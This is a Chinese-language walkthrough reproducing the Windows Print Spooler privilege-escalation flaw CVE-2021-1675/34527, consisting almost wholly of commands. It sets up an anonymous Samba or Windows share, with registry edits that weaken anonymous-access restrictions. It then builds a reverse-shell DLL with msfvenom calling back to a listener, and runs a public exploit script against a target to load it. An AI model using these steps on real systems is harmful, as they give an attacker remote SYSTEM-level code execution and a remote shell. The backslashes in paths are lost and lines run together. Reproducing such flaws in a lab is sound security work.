CVE-2021-1675/34527：Windows Print Spooler权限提升复现

* Windows Server 2019 (Server Core installation)  * Windows Server 2012 R2 (Server Core installation)* Windows Server 2012 R2* Windows Server 2012 (Server Core installation)* Windows Server 2012* Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)* Windows RT 8.1* Windows 8.1 for x64-based systems* Windows 8.1 for 32-bit systems* Windows 7 for x64-based Systems Service Pack 1* Windows 7 for 32-bit Systems Service Pack 1* Windows 10 Version 1607 for x64-based Systems* Windows 10 Version 1607 for 32-bit Systems

[global]    map to guest = Bad User    server role = standalone server    usershare allow guests = yes    idmap config * : backend = tdb    smb ports = 445[smb]    comment = Samba    path = /usr/share2        guest ok = yes    read only = no    browsable = yes

service smbd restart

mkdir /usr/share2

mkdir C:shareicacls C:share /T /grant "ANONYMOUS LOGON":ricacls C:share /T /grant Everyone:rNew-SmbShare -Path C:share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'（powershell下运行不适合win7）REG ADD "HKLMSystemCurrentControlSetServicesLanManServerParameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipesREG ADD "HKLMSystemCurrentControlSetServicesLanManServerParameters" /v NullSessionShares /t REG_MULTI_SZ /d share /fREG ADD "HKLMSystemCurrentControlSetControlLsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /fREG ADD "HKLMSystemCurrentControlSetControlLsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f

git clone https://github.com/cube0x0/impacketcd impacketpython3 ./setup.py install

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.3.55 LPORT=4444 -f dll -o /usr/share2/shell.dll

msf 和 nc开启监听都可以 nc -lnvp 4444

exp地址：https://github.com/cube0x0/CVE-2021-1675python3 CVE-2021-1675.py test.com/win10:"windows10>?"@192.168.3.3 '\192.168.3.55smbshell.dll'

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675